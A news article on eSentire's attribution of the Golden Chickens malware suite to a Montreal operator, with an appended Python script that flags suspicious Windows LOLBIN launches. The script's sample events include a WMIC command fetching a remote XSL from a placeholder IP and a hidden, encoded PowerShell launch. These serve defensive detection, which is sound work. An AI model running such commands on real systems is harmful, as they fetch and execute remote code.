Montreal man alleged to be an operator behind the Golden Chickens malware | IT World Canada News

One of the threat actors behind the Golden Chickens malware suite, said to be favoured by three major Russian criminal cyber gangs, lives in Montreal, according to an investigation by a Canadian-based managed security services firm.

The claim was made Thursday by researchers at eSentire following a 16-month investigation into the individual behind posts on a number of hacker forums and social media sites, where “Chuck from Montreal” may have made some slips, including mentioning his love of BMWs.

The report doesn’t name the individual. But eSentire’s threat response unit says it knows “Chuck’s” real name, has photos of him, his home address, the names of his parents, siblings and friends, his social media accounts, his hobbies, and that he owns a small business which he runs out of his home. He also has a keen interest in buying stolen Canadian credit card accounts, the researchers say.

Their work has been turned over to police, although the report doesn’t say which force.

In addition to being an interesting example of how to use publicly available threat intelligence and sleuthing, the report includes indicators of compromise and techniques used by major threat groups that IT security teams can leverage.

The researchers also allege police missed an opportunity years ago when Trend Micro published a report in 2015 about a threat actor using the names “Frapstar” and “badbullzvenom.” eSentire believes Frapstar is “Chuck” and shares the badbullzvenom account with another operator of Golden Chickens. That individual claims to be from Moldova.

The 2015 Trend Micro report “provided solid intelligence about this threat actor, giving law enforcement a real chance of identifying and potentially arresting badbullzvenom when he was still a minor player on the cybercrime scene,” says eSentire.

“Instead, he has had seven years to hone his skills, and from our findings, we see that he has continued to get better at developing malware and obfuscating it. Badbullzvenom is very stealthy, and he goes to extremes to keep his malware fully undetectable (FUD) by anti-virus, trying to make sure that samples of Golden Chickens are not uploaded to Virus Total. Badbullzvenom also insists that his clients only use his malware in very ‘targeted’ attacks to further ensure that he and his malicious software fly under the radar. We believe the case of the Golden Chickens operator is a stark example of what can happen if a threat actor, who is considered ‘low hanging fruit,’ is ignored by law enforcement.”

It isn’t known whether police ignored the report.

eSentire says Golden Chickens is the “cyber weapon of choice” for three of the top money-making and longest-running Internet crime groups: Russia-based FIN6 and Cobalt Group, and Belarus-based Evilnum. The three are estimated to have collectively caused financial losses of over US$1.5 billion, the researchers say.

Since 2018, the Golden Chickens suite has been distributed as Malware-as-a-Service (MaaS), the report says. Between April 2021 and April of this year, the researchers found two significant hacking campaigns using Golden Chickens. During the April 2021 incidents, corporate employees on LinkedIn were targeted with fake job offers. One year later, the attack tactics were reversed, with corporate hiring managers sent fake resumes of job candidates, laden with malware.

There is compelling evidence that the threat actor detailed in the report is one of probably two operators behind the badbullzvenom account on the hacker forum, says eSentire.

“Interestingly,” it adds, “as of July 2022, all of badbullzvenom’s posts on have been purged from the forum.” That could be because a threat actor calling themselves “babay” went on to and accused badbullzvenom of stealing $1 million from him. Babay has issued a $200,000 bounty for any information leading to badbullzvenom’s real identity.

On the other hand, eSentire continues to see improvements in the Golden Chickens source code and new Golden Chickens attack campaigns. “That tells us that the malware suite is still actively being developed and is being sold to other threat actors,” the report says.

eSentire recommends IT security leaders use exhaustive endpoint monitoring for LOLBINs, also known as Trusted Windows Binary abuse. LOLBINs of interest include cmd.exe, wscript.exe, wmic.exe, cmstp.exe, msxsl.exe, powershell.exe, and ie4uinit.exe. Ensure endpoint products have rules in place to detect suspicious usage of these Windows processes, the report says.
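As an added example (not code from the report or from eSentire), the following Python triage over constructed, Sysmon-style process-creation events shows what a rule for “suspicious usage” of those LOLBINs can look like: a LOLBIN launched by a document viewer or mail client (the malware-laden resume scenario), a chain of one LOLBIN spawning another, or a command line that fetches a remote URL or runs hidden/encoded PowerShell. The parent-process list, the command-line patterns and the sample events are assumptions built for illustration, not indicators from the report.

```python
import ntpath
import re

# LOLBINs named in the eSentire report, as lower-cased image file names.
LOLBINS = {"cmd.exe", "wscript.exe", "wmic.exe", "cmstp.exe",
           "msxsl.exe", "powershell.exe", "ie4uinit.exe"}
# Parents from which a LOLBIN launch is unusual: document viewers and mail client.
DOC_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "acrord32.exe"}
# Command-line traits rarely seen in legitimate administration (assumed set).
CMDLINE_RULES = [
    ("remote script or stylesheet fetch", re.compile(r"https?://", re.I)),
    ("encoded or hidden PowerShell",
     re.compile(r"\s-(?:e|enc|encodedcommand|w(?:indowstyle)?\s+hidden)\b", re.I)),
]

def image_name(path):
    return ntpath.basename(path).lower()   # file name only, case-folded

def evaluate(event):
    """Return the reasons a process-creation event is suspicious ([] if none)."""
    image = image_name(event["Image"])
    if image not in LOLBINS:
        return []
    reasons = []
    parent = image_name(event["ParentImage"])
    if parent in DOC_PARENTS:
        reasons.append(f"{image} spawned by {parent}")
    elif parent in LOLBINS and parent != image:
        reasons.append(f"LOLBIN chain {parent} -> {image}")
    for label, pattern in CMDLINE_RULES:
        if pattern.search(event["CommandLine"]):
            reasons.append(label)
    return reasons

def triage(events):
    """Map event id -> reasons for every event that matched at least one rule."""
    return {e["id"]: r for e in events if (r := evaluate(e))}

# Constructed sample events in Sysmon Event ID 1 style; not from the report.
SAMPLE_EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'wmic os get /format:"http://203.0.113.5/style.xsl"'},
    {"id": 2, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"cmd.exe /c powershell -w hidden -enc SQBFAFgA"},
    {"id": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\Inventory.ps1"},
]
```

Calling `triage(SAMPLE_EVENTS)` flags events 1 and 2 with their reasons and leaves the scheduled-task style PowerShell launch in event 3 alone; in production the same logic would run over the endpoint product’s process telemetry rather than an inline list.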
